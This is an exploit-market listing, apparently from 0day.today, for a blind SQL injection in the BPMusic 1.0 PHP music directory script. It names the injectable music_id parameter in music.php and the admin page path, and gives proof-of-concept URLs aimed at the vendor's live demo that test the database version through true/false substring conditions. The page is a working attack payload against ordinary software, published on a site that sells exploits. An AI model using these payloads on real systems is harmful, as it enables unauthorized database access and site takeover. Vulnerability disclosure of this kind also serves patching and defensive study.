[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BPMusic 1.0 blind SQL Injection

Author
OoN Boy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9851
Category
web applications
Date add
22-09-2009
Platform
unsorted
===============================
BPMusic 1.0 blind SQL Injection
===============================

[x]========================================================================================================================================[x]
 | Title            : BPMusic 1.0 blind SQL Vulnerabilities                                         |
 | Software         : BPMusic                                                       |
 | Vendor           : http://bpowerhouse.info                                               |
 | Demo         : http://bpowerhouse.com/demos/bpmusic                                          |
 | Date         : 22 September 2009 ( Indonesia )                                           |
 | Author           : OoN_Boy                                                       |                                              |
[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Technology       : PHP                                                                                                               |
 | Database     : MySQL                                                                                                             |
 | Version      : 1.0                                                                                                               |
 | License      : GNU GPL                                                                                                           |
 | Price        : $28.90                                                                                                            |
 | Description      : is a music directory site script, ready for use web directory of music providing audio files. The site is         |
 |            available for users in four different languages (English , Spanish, Frensh and German). Users may search the      |
 |            directory for desired music files and listen to them. The site contains an advanced administration panel for      |
 |            management of  the sites data,postings approval and much more                             |
[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Google Dork      : cari sendiri yah :)                                                   |
[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Exploit      : http://localhost/[path]/music.php?music_id=[sql]                                  |
 | Aadmin Page      : http://localhost/[path]/admin/index.php                                       |
[x]========================================================================================================================================[x]
 
 
 
[x]========================================================================================================================================[x]
 | Proof of concept : http://bpowerhouse.com/demos/bpmusic/music.php?music_id=292+and+substring(@@version,1,1)=5 True           |
 |            http://bpowerhouse.com/demos/bpmusic/music.php?music_id=292+and+substring(@@version,1,1)=4 False          |
[x]========================================================================================================================================[x]



#  0day.today [2024-12-28]  #